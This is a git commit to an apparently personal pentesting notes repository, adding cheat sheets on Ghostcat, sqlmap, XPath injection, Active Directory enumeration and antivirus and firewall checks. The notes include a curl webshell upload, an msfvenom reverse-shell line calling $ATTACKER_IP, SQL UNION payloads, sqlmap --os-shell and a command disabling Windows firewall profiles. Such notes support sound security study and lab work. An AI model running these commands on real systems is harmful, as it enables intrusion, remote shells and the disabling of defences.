This commit is contained in:
Stefan Friese 2022-02-07 23:37:05 +01:00
parent 0caf7edbf6
commit 361227c060
17 changed files with 4294 additions and 1741 deletions

View File

@ -1,5 +1,7 @@
# Ret2libc # Ret2libc
* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
* Check binary via * Check binary via
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
* `file` * `file`

14
exploit/java/ghostcat.md Normal file
View File

@ -0,0 +1,14 @@
# Ghostcat
* CVE-2020-1938
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
* upload the file via
```sh
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
```
* Visit the webshell at `$TARGET_IP:8080/shello/`
* Alternatively use a war reverse shell via
```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
```

View File

@ -135,40 +135,6 @@ GET /about/0 UNION select column_name, null,null,null,null from information_sche
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1 GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
``` ```
## Tools
### SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
* Use `-r` with a saved HTTP request
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```
### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)
## Payloads ## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads) * [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)

43
exploit/sqli/sqlmap.md Normal file
View File

@ -0,0 +1,43 @@
# SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
## Usage
* Use `-r` with a saved HTTP request
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|--tables|Show tables|
|-T|Specify table|
## Other Tools
### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```
### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)

View File

@ -1,7 +1,7 @@
# Bypassing Rate Limit # Bypassing Rate Limit
* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c) * [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
* [Anotherinfosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17) * [Another infosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass) * [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
# Usage # Usage

@ -1 +1 @@
Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15 Subproject commit 616b0e527f62dd0930e6346ede6bef79e9bcf717

6
exploit/web/xpath.md Normal file
View File

@ -0,0 +1,6 @@
# XPATH injection
* Similar to SQL injection, it is a input/parameter injection
* [payloads all the things XPATH](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
* Use [lanfran's payload list](https://lanfran02.github.io/posts/cold_vvars/XPATH_list.txt) as burpsuite sniper payload

View File

@ -0,0 +1,9 @@
# crackmapexec
* In general, the syntax is as follows
```sh
crackmapexec smb $DOMAIN -u <user> -p <password>
```
* Do not set the domain at the end, it won't work.

3
misc/smtp.md Normal file
View File

@ -0,0 +1,3 @@
# SMTP
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)

View File

@ -0,0 +1,30 @@
# Active Directory Enumeration
* Consists of
* Domain Controller
* Organizational Units
* AD Domains
* AD Forest
* Administrative accounts are
* Domain Admin
* Enterprise Admin
* Schema Admin
* Server Operator
* Account Operator
## Usage
* `systeminfo | findstr Domain`
* `Get-ADUser -filter *`
* Use found CN and DC and specify
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
### DNS
* Check ip via `ipconfig`
* `nslookup`, then `server <LocalIP>` and zone transfer via
```sh
ls -d <Domain>
```

View File

@ -8,6 +8,32 @@
* Static Detection -- Hash or String/Byte Matching * Static Detection -- Hash or String/Byte Matching
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox * Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
## Enumeration
```sh
wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
```
```sh
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
```
* Check firewall
```sh
Get-NetFirewallProfile | Format-Table Name, Enabled
```
```sh
Get-NetFirewallRule | select DisplayName, Enabled, Description
```
* Check inbound port availability
```sh
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
```
## Reset Options
```sh
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
```
## Anti Malware Secure Interface ## Anti Malware Secure Interface
* https://docs.microsoft.com/en-us/windows/win32/amsi/ * https://docs.microsoft.com/en-us/windows/win32/amsi/

View File

@ -8,3 +8,9 @@ reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transc
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
``` ```
## Usage
```sh
Get-EventLog -List
```

5714
post_exploitation/priv_esc/privesc-scripts/linpeas.sh Executable file → Normal file

File diff suppressed because one or more lines are too long

@ -1 +1 @@
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470 Subproject commit 7c94b90223cd40c664b6e0107b5f1bf744ab5d17

@ -1 +1 @@
Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db Subproject commit 7c275d50bc324f3152650fe22b3f92bb4da23275